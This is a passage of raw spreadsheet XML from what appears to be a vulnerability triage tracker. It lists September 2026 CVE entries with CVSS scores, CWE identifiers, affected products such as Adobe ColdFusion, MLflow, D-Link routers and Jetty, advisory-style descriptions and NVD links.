t="inlineStr"><is><t>NVD</t></is></c><c r="G289" s="5" t="inlineStr" /><c r="H289" s="5" t="n"><v>0.005</v></c><c r="I289" s="5" t="inlineStr" /><c r="J289" s="5" t="inlineStr" /><c r="K289" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L289" s="5" t="inlineStr" /><c r="M289" s="5" t="inlineStr" /><c r="N289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P289" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q289" s="5" t="inlineStr" /><c r="R289" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S289" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t></is></c></row><row r="290"><c r="A290" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C290" s="5" t="inlineStr"><is><t>CVE-2026-79721</t></is></c><c r="D290" s="5" t="n"><v>8.6</v></c><c r="E290" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F290" s="5" t="inlineStr"><is><t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t></is></c><c r="G290" s="5" t="inlineStr" /><c r="H290" s="5" t="n"><v>0.003</v></c><c r="I290" s="5" t="inlineStr" /><c r="J290" s="5" t="inlineStr" /><c r="K290" s="5" t="inlineStr" /><c r="L290" s="5" t="inlineStr" /><c r="M290" s="5" t="inlineStr" /><c r="N290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P290" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q290" s="5" t="inlineStr" /><c r="R290" s="5" t="inlineStr"><is><t>CWE-829</t></is></c><c r="S290" s="5" t="inlineStr"><is><t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t></is></c><c r="T290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t></is></c></row><row r="291"><c r="A291" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C291" s="5" t="inlineStr"><is><t>CVE-2026-80097</t></is></c><c r="D291" s="5" t="n"><v>8.6</v></c><c r="E291" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F291" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G291" s="5" t="inlineStr" /><c r="H291" s="5" t="n"><v>0.004</v></c><c r="I291" s="5" t="inlineStr" /><c r="J291" s="5" t="inlineStr" /><c r="K291" s="5" t="inlineStr" /><c r="L291" s="5" t="inlineStr" /><c r="M291" s="5" t="inlineStr" /><c r="N291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P291" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q291" s="5" t="inlineStr" /><c r="R291" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S291" s="5" t="inlineStr"><is><t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t></is></c></row><row r="292"><c r="A292" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C292" s="5" t="inlineStr"><is><t>CVE-2026-86509</t></is></c><c r="D292" s="5" t="n"><v>8.6</v></c><c r="E292" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F292" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G292" s="5" t="inlineStr" /><c r="H292" s="5" t="n"><v>0.004</v></c><c r="I292" s="5" t="inlineStr" /><c r="J292" s="5" t="inlineStr" /><c r="K292" s="5" t="inlineStr" /><c r="L292" s="5" t="inlineStr" /><c r="M292" s="5" t="inlineStr" /><c r="N292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P292" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q292" s="5" t="inlineStr" /><c r="R292" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S292" s="5" t="inlineStr"><is><t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t></is></c><c r="T292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t></is></c></row><row r="293"><c r="A293" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C293" s="5" t="inlineStr"><is><t>CVE-2026-86510</t></is></c><c r="D293" s="5" t="n"><v>8.6</v></c><c r="E293" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F293" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G293" s="5" t="inlineStr" /><c r="H293" s="5" t="n"><v>0.005</v></c><c r="I293" s="5" t="inlineStr" /><c r="J293" s="5" t="inlineStr" /><c r="K293" s="5" t="inlineStr" /><c r="L293" s="5" t="inlineStr" /><c r="M293" s="5" t="inlineStr" /><c r="N293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q293" s="5" t="inlineStr" /><c r="R293" s="5" t="inlineStr"><is><t>CWE-119, CWE-787</t></is></c><c r="S293" s="5" t="inlineStr"><is><t>A vulnerability has been found in D-Link DIR-822A A_101. Affected is the function tunnel_set_params of the component L2TP Control Message Parser. Such manipulation leads to out-of-bounds write. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="T293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t></is></c></row><row r="294"><c r="A294" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C294" s="5" t="inlineStr"><is><t>CVE-2026-86712</t></is></c><c r="D294" s="5" t="n"><v>8.6</v></c><c r="E294" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F294" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G294" s="5" t="inlineStr" /><c r="H294" s="5" t="n"><v>0.004</v></c><c r="I294" s="5" t="inlineStr" /><c r="J294" s="5" t="inlineStr" /><c r="K294" s="5" t="inlineStr" /><c r="L294" s="5" t="inlineStr" /><c r="M294" s="5" t="inlineStr" /><c r="N294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P294" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q294" s="5" t="inlineStr" /><c r="R294" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S294" s="5" t="inlineStr"><is><t>SiYuan before 3.8.2 trusts the attacker-writable text/siyuan clipboard MIME type and skips sanitization in the paste handler, allowing code execution in the Node-enabled desktop renderer. Attackers can craft malicious web pages that write to the clipboard, and when pasted into SiYuan, injected scripts execute with full Node.js access through the Electron main process.</t></is></c><c r="T294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t></is></c></row><row r="295"><c r="A295" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C295" s="5" t="inlineStr"><is><t>CVE-2026-86722</t></is></c><c r="D295" s="5" t="n"><v>8.6</v></c><c r="E295" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F295" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G295" s="5" t="inlineStr" /><c r="H295" s="5" t="n"><v>0.003</v></c><c r="I295" s="5" t="inlineStr" /><c r="J295" s="5" t="inlineStr" /><c r="K295" s="5" t="inlineStr" /><c r="L295" s="5" t="inlineStr" /><c r="M295" s="5" t="inlineStr" /><c r="N295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P295" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q295" s="5" t="inlineStr" /><c r="R295" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S295" s="5" t="inlineStr"><is><t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability where sqlDAL caches empty result sets that writeSql never invalidates. Attackers with a valid password can bypass email two-factor authentication on new devices because the confirmation code hash fails to generate from the stale cached empty result.</t></is></c><c r="T295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t></is></c></row><row r="296"><c r="A296" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C296" s="5" t="inlineStr"><is><t>CVE-2026-58113</t></is></c><c r="D296" s="5" t="n"><v>8.5</v></c><c r="E296" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F296" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G296" s="5" t="inlineStr" /><c r="H296" s="5" t="n"><v>0.002</v></c><c r="I296" s="5" t="inlineStr" /><c r="J296" s="5" t="inlineStr" /><c r="K296" s="5" t="inlineStr" /><c r="L296" s="5" t="inlineStr" /><c r="M296" s="5" t="inlineStr" /><c r="N296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P296" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q296" s="5" t="inlineStr" /><c r="R296" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S296" s="5" t="inlineStr"><is><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is></c><c r="T296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t></is></c></row><row r="297"><c r="A297" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C297" s="5" t="inlineStr"><is><t>CVE-2026-67379</t></is></c><c r="D297" s="5" t="n"><v>8.5</v></c><c r="E297" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G297" s="5" t="inlineStr" /><c r="H297" s="5" t="n"><v>0.006</v></c><c r="I297" s="5" t="inlineStr" /><c r="J297" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K297" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L297" s="5" t="inlineStr" /><c r="M297" s="5" t="inlineStr" /><c r="N297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P297" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q297" s="5" t="inlineStr" /><c r="R297" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S297" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t></is></c></row><row r="298"><c r="A298" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C298" s="5" t="inlineStr"><is><t>CVE-2026-74860</t></is></c><c r="D298" s="5" t="n"><v>8.5</v></c><c r="E298" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F298" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G298" s="5" t="inlineStr" /><c r="H298" s="5" t="n"><v>0.004</v></c><c r="I298" s="5" t="inlineStr" /><c r="J298" s="5" t="inlineStr" /><c r="K298" s="5" t="inlineStr" /><c r="L298" s="5" t="inlineStr" /><c r="M298" s="5" t="inlineStr" /><c r="N298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P298" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q298" s="5" t="inlineStr" /><c r="R298" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S298" s="5" t="inlineStr"><is><t>A flaw was found in libxml2 with Python bindings enabled. A remote attacker could exploit this vulnerability by providing a specially crafted XML document containing a Document Type Definition (DTD) with enumerated attribute values. This triggers a double-free error in the SAX attributeDecl callback handler, where a string is freed twice. This flaw can lead to a denial of service (DoS) due to a reproducible crash in Python applications using the libxml2 SAX bindings.</t></is></c><c r="T298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t></is></c></row><row r="299"><c r="A299" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C299" s="5" t="inlineStr"><is><t>CVE-2026-75993</t></is></c><c r="D299" s="5" t="n"><v>8.5</v></c><c r="E299" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F299" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G299" s="5" t="inlineStr" /><c r="H299" s="5" t="n"><v>0.004</v></c><c r="I299" s="5" t="inlineStr" /><c r="J299" s="5" t="inlineStr" /><c r="K299" s="5" t="inlineStr" /><c r="L299" s="5" t="inlineStr" /><c r="M299" s="5" t="inlineStr" /><c r="N299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P299" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q299" s="5" t="inlineStr" /><c r="R299" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S299" s="5" t="inlineStr"><is><t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t></is></c></row><row r="300"><c r="A300" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C300" s="5" t="inlineStr"><is><t>CVE-2026-76958</t></is></c><c r="D300" s="5" t="n"><v>8.5</v></c><c r="E300" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F300" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G300" s="5" t="inlineStr" /><c r="H300" s="5" t="n"><v>0.002</v></c><c r="I300" s="5" t="inlineStr" /><c r="J300" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K300" s="5" t="inlineStr" /><c r="L300" s="5" t="inlineStr" /><c r="M300" s="5" t="inlineStr" /><c r="N300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q300" s="5" t="inlineStr" /><c r="R300" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S300" s="5" t="inlineStr"><is><t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t></is></c><c r="T300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t></is></c></row><row r="301"><c r="A301" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C301" s="5" t="inlineStr"><is><t>CVE-2026-85384</t></is></c><c r="D301" s="5" t="n"><v>8.5</v></c><c r="E301" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F301" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G301" s="5" t="inlineStr" /><c r="H301" s="5" t="n"><v>0.002</v></c><c r="I301" s="5" t="inlineStr" /><c r="J301" s="5" t="inlineStr" /><c r="K301" s="5" t="inlineStr" /><c r="L301" s="5" t="inlineStr" /><c r="M301" s="5" t="inlineStr" /><c r="N301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P301" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q301" s="5" t="inlineStr" /><c r="R301" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S301" s="5" t="inlineStr"><is><t>A stack-based buffer overflow vulnerability exists in the httpd component of RE210 AC750 due to improper bounds checking in the splitString function when processing an uploaded configuration file. An authenticated attacker on the local network can upload a crafted configuration file to trigger the overflow, leading to remote code execution.





Successful exploitation may allow unauthorized access to sensitive information, modification of device configuration and network behavior, or disruption of device availability.</t></is></c><c r="T301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t></is></c></row><row r="302"><c r="A302" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C302" s="5" t="inlineStr"><is><t>CVE-2026-69479</t></is></c><c r="D302" s="5" t="n"><v>8.4</v></c><c r="E302" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G302" s="5" t="inlineStr" /><c r="H302" s="5" t="n"><v>0.003</v></c><c r="I302" s="5" t="inlineStr" /><c r="J302" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K30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02" s="5" t="inlineStr" /><c r="M302" s="5" t="inlineStr" /><c r="N302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P302" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q302" s="5" t="inlineStr" /><c r="R302" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S302" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t></is></c></row><row r="303"><c r="A303" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C303" s="5" t="inlineStr"><is><t>CVE-2026-69638</t></is></c><c r="D303" s="5" t="n"><v>8.4</v></c><c r="E303" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G303" s="5" t="inlineStr" /><c r="H303" s="5" t="n"><v>0.003</v></c><c r="I303" s="5" t="inlineStr" /><c r="J303" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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03" s="5" t="inlineStr" /><c r="M303" s="5" t="inlineStr" /><c r="N303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P303" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q303" s="5" t="inlineStr" /><c r="R303" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S303" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t></is></c></row><row r="304"><c r="A304" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C304" s="5" t="inlineStr"><is><t>CVE-2026-75999</t></is></c><c r="D304" s="5" t="n"><v>8.4</v></c><c r="E304" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F304" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G304" s="5" t="inlineStr" /><c r="H304" s="5" t="n"><v>0.004</v></c><c r="I304" s="5" t="inlineStr" /><c r="J304" s="5" t="inlineStr" /><c r="K304" s="5" t="inlineStr" /><c r="L304" s="5" t="inlineStr" /><c r="M304" s="5" t="inlineStr" /><c r="N304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P304" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q304" s="5" t="inlineStr" /><c r="R304" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S304" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t></is></c></row><row r="305"><c r="A305" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C305" s="5" t="inlineStr"><is><t>CVE-2026-77827</t></is></c><c r="D305" s="5" t="n"><v>8.4</v></c><c r="E305" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F305" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G305" s="5" t="inlineStr" /><c r="H305" s="5" t="n"><v>0.002</v></c><c r="I305" s="5" t="inlineStr" /><c r="J305" s="5" t="inlineStr" /><c r="K305" s="5" t="inlineStr" /><c r="L305" s="5" t="inlineStr" /><c r="M305" s="5" t="inlineStr" /><c r="N305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P305" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q305" s="5" t="inlineStr" /><c r="R305" s="5" t="inlineStr"><is><t>CWE-428</t></is></c><c r="S305" s="5" t="inlineStr"><is><t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t></is></c><c r="T305" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t></is></c></row><row r="306"><c r="A306" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C306" s="5" t="inlineStr"><is><t>CVE-2026-86819</t></is></c><c r="D306" s="5" t="n"><v>8.4</v></c><c r="E306" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F306" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G306" s="5" t="inlineStr" /><c r="H306" s="5" t="n"><v>0.001</v></c><c r="I306" s="5" t="inlineStr" /><c r="J306" s="5" t="inlineStr" /><c r="K306" s="5" t="inlineStr" /><c r="L306" s="5" t="inlineStr" /><c r="M306" s="5" t="inlineStr" /><c r="N306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P306" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q306" s="5" t="inlineStr" /><c r="R306" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S306" s="5" t="inlineStr"><is><t>Waves Central for macOS contains a local privilege escalation in the privileged helper service. The helper authorizes connecting XPC clients by comparing the caller's code-signing certificate chain for equality with its own, rather than validating the caller against a pinned code requirement (application identifier and Team ID). A local, authenticated user can execute code within the vendor-signed process, satisfy the helper's client check, and cause the helper to execute a script with root privileges. Fixed in 17.0.</t></is></c><c r="T306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t></is></c></row><row r="307"><c r="A307" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C307" s="5" t="inlineStr"><is><t>CVE-2026-19203</t></is></c><c r="D307" s="5" t="n"><v>8.300000000000001</v></c><c r="E307" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F307" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G307" s="5" t="inlineStr" /><c r="H307" s="5" t="n"><v>0.003</v></c><c r="I307" s="5" t="inlineStr" /><c r="J307" s="5" t="inlineStr" /><c r="K307" s="5" t="inlineStr" /><c r="L307" s="5" t="inlineStr" /><c r="M307" s="5" t="inlineStr" /><c r="N307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q307" s="5" t="inlineStr" /><c r="R307" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S307" s="5" t="inlineStr"><is><t>A client may issue specially crafted HTTP/1.1 chunked requests to a Jetty server that cause Jetty and an intermediary proxy to interpret different request boundaries, potentially resulting in HTTP request smuggling.




This is caused by Jetty accepting a lone LF character as a terminator in parts of chunked request parsing. Depending on the Jetty version and configured HTTP compliance mode, this may occur in chunk extensions, chunk data termination, or trailer termination.</t></is></c><c r="T307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t></is></c></row><row r="308"><c r="A308" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C308" s="5" t="inlineStr"><is><t>CVE-2026-69646</t></is></c><c r="D308" s="5" t="n"><v>8.300000000000001</v></c><c r="E308" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G308" s="5" t="inlineStr" /><c r="H308" s="5" t="n"><v>0.002</v></c><c r="I308" s="5" t="inlineStr" /><c r="J308" s="5" t="inlineStr" /><c r="K308" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L308" s="5" t="inlineStr" /><c r="M308" s="5" t="inlineStr" /><c r="N308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P308" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q308" s="5" t="inlineStr" /><c r="R308" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S308" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t></is></c></row><row r="309"><c r="A309" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C309" s="5" t="inlineStr"><is><t>CVE-2026-81821</t></is></c><c r="D309" s="5" t="n"><v>8.300000000000001</v></c><c r="E309" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F309" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G309" s="5" t="inlineStr" /><c r="H309" s="5" t="n"><v>0.001</v></c><c r="I309" s="5" t="inlineStr" /><c r="J309" s="5" t="inlineStr" /><c r="K309" s="5" t="inlineStr" /><c r="L309" s="5" t="inlineStr" /><c r="M309" s="5" t="inlineStr" /><c r="N309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P309" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q309" s="5" t="inlineStr" /><c r="R309" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="S309" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t></is></c><c r="T309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t></is></c></row><row r="310"><c r="A310" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C310" s="5" t="inlineStr"><is><t>CVE-2026-81822</t></is></c><c r="D310" s="5" t="n"><v>8.300000000000001</v></c><c r="E310" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F310" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G310" s="5" t="inlineStr" /><c r="H310" s="5" t="n"><v>0.001</v></c><c r="I310" s="5" t="inlineStr" /><c 